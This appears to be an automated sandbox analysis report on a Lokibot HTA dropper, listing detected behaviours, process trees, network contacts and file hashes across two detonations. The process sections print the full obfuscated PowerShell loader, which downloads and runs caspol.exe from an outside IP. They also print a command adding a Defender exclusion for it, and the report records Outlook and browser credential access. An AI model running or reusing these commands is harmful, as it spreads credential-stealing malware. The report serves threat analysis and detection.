Analysis Overview
SHA256
dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21
Threat Level: Known bad
The file seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta was found to be: Known bad.
Malicious Activity Summary
Lokibot
Lokibot family
Evasion via Device Credential Deployment
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
outlook_win_path
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_office_path
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-18 17:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-18 17:36
Reported
2024-11-18 17:38
Platform
win7-20240903-en
Max time kernel
134s
Max time network
144s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2352 set thread context of 1624 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta"
C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
"C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvmrx4cu.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF29.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDF28.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | f94104592811cc91c4a68e8ed0aec140 |
| SHA1 | faf40098525967cc8f3520d866a0d6f159446993 |
| SHA256 | b6c894126b6c2f477fba4afa62030fef985b07261a367e231f512a65d3dbb084 |
| SHA512 | 397d1f0182ad0bf1da1867df4bd859860e9c6bf663edeadf8611a30678301deca6aeeeeb00368f837b79ad9bdcf645d20ac2f695016c49b71094c14e7fb5b282 |
\??\c:\Users\Admin\AppData\Local\Temp\qvmrx4cu.cmdline
| MD5 | f46cb4f9e8e062750ca6490d9df0eee5 |
| SHA1 | c00be5627ece61cd0185fc76183caac998b39226 |
| SHA256 | a715c7bbbd68f4462a82a32e583c4753774c54354eb99fc2bd2c4f177792bca5 |
| SHA512 | d02a0b4d5e55405ef912e3c9f64b65d39138b883f23dc4f101fd8ca4e1c705534d4453c67f8d554b8176cf50f842b1e3feedf2f6ada85afd3d2a6e305da621e7 |
\??\c:\Users\Admin\AppData\Local\Temp\qvmrx4cu.0.cs
| MD5 | f97fc8141f59078b4354b513d3b083ac |
| SHA1 | 293904ab8d5f38a2f0764ee2e35e97e590d8c737 |
| SHA256 | f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e |
| SHA512 | 87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c |
\??\c:\Users\Admin\AppData\Local\Temp\CSCDF28.tmp
| MD5 | 20fd58f7b4a27dd951e230b753e4446d |
| SHA1 | 83a3fc556b708880588cb295da35eb50d28ea47d |
| SHA256 | 48606746578b4f8c7b74d9200fa4989c18a8ee687ae90c07c89f4e057f22156f |
| SHA512 | 6d5e9fb666e6d5155134b6c31c93a3f91e84e77c6ebb8233e3a1712c042921505f7c07660bc288c77772920e7e904f477b80831a5d3e15b86f21d8c3f8eff6b3 |
C:\Users\Admin\AppData\Local\Temp\RESDF29.tmp
| MD5 | 171aa8106716a441ce7ee396e96469a9 |
| SHA1 | 595da5491e361cde5e1cb78e09faf214e56d791a |
| SHA256 | 653c38078adefa1f453b14615c04dcfe07ad7bd862c85781afa704aea1d0d289 |
| SHA512 | 7a7a180d7ba7558aa0c69a2f32c9267aaa5c9cc5cd5d83bd2caae36c9bab3ea609bc91aef1cf2981e3be152e5396d7d4eece0767ba56f06b32a3a0fc41f0039b |
C:\Users\Admin\AppData\Local\Temp\qvmrx4cu.dll
| MD5 | e48ea449bdcbae330e4f633102344ed2 |
| SHA1 | a3965ad5e607e8f6ca9da235c5d64d829981dd40 |
| SHA256 | c68f7f5fd86f613254f970375c3c543c4e33fe0180f04db75c2de3e623bb8af1 |
| SHA512 | 83014b98513dfe4fbfc1528aa9176138f2842f1dbaba4ab7a22c8e311b6bec3a42c151cc0b96f10fcba8eaa561530cc411ccb70a4119f627fb6d52cb6cf802e8 |
C:\Users\Admin\AppData\Local\Temp\qvmrx4cu.pdb
| MD5 | c982c21d8a278fb274db38f1e82352da |
| SHA1 | 9d9b8f2af7f7cc14765d6fdc9879da696b967932 |
| SHA256 | 074f193d794ff8217b7a586b4a0976b948ea6735b0a68b14b281f6406c765826 |
| SHA512 | 911a1c9ef9c9c8eb1d41df8e200be39d1563bf5fa61b5e73ce1728000db08ec296e145556a3c6fecfd503b0ca3f3bd09ceb7e0e002bd5fc09201e095a72d0438 |
\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 80358303e33cef71434e6e4a621262c5 |
| SHA1 | e7a22b4e5af741f9b4d9982f36164b276bba459a |
| SHA256 | f3246d0ca5ca8e69f98ca33b2c17813d5d862049dcfa9931dbcbaaaf7543a1f7 |
| SHA512 | 5e68b8c63afe7c0e91396f42f485cd84946235ab11d9ce7107bbcf75568ff3087d5e14378f87d77733376e332f516f26db838b870ca580569178b15c0a90761e |
memory/2352-35-0x0000000000820000-0x00000000008B4000-memory.dmp
memory/2352-36-0x0000000000470000-0x0000000000482000-memory.dmp
memory/2352-37-0x0000000005950000-0x00000000059B4000-memory.dmp
memory/1624-38-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-40-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-49-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-48-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1624-46-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-51-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-44-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-42-0x0000000000400000-0x00000000004A2000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-18 17:36
Reported
2024-11-18 17:38
Platform
win10v2004-20241007-en
Max time kernel
139s
Max time network
150s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3180 set thread context of 1196 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
"C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvxa3jwg\qvxa3jwg.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1F8.tmp" "c:\Users\Admin\AppData\Local\Temp\qvxa3jwg\CSC21F546F2CC29440ABFE9B5BCAF7FEEC9.TMP"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| US | 8.8.8.8:53 | 231.187.63.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.129.81.91.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | tcp | |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | tcp | |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp |
Files
memory/1448-0-0x000000007136E000-0x000000007136F000-memory.dmp
memory/1448-1-0x0000000002F80000-0x0000000002FB6000-memory.dmp
memory/1448-3-0x0000000071360000-0x0000000071B10000-memory.dmp
memory/1448-2-0x0000000005950000-0x0000000005F78000-memory.dmp
memory/1448-4-0x0000000071360000-0x0000000071B10000-memory.dmp
memory/1448-5-0x0000000005FB0000-0x0000000005FD2000-memory.dmp
memory/1448-7-0x00000000061C0000-0x0000000006226000-memory.dmp
memory/1448-6-0x0000000006150000-0x00000000061B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcme1m0g.mjh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1448-17-0x0000000006330000-0x0000000006684000-memory.dmp
memory/1448-18-0x0000000006840000-0x000000000685E000-memory.dmp
memory/1448-19-0x0000000006890000-0x00000000068DC000-memory.dmp
memory/1488-29-0x0000000007990000-0x00000000079C2000-memory.dmp
memory/1488-30-0x000000006DC20000-0x000000006DC6C000-memory.dmp
memory/1488-40-0x0000000006D90000-0x0000000006DAE000-memory.dmp
memory/1488-41-0x00000000079D0000-0x0000000007A73000-memory.dmp
memory/1488-42-0x0000000008130000-0x00000000087AA000-memory.dmp
memory/1488-43-0x0000000007AE0000-0x0000000007AFA000-memory.dmp
memory/1488-44-0x0000000007B40000-0x0000000007B4A000-memory.dmp
memory/1488-45-0x0000000007D70000-0x0000000007E06000-memory.dmp
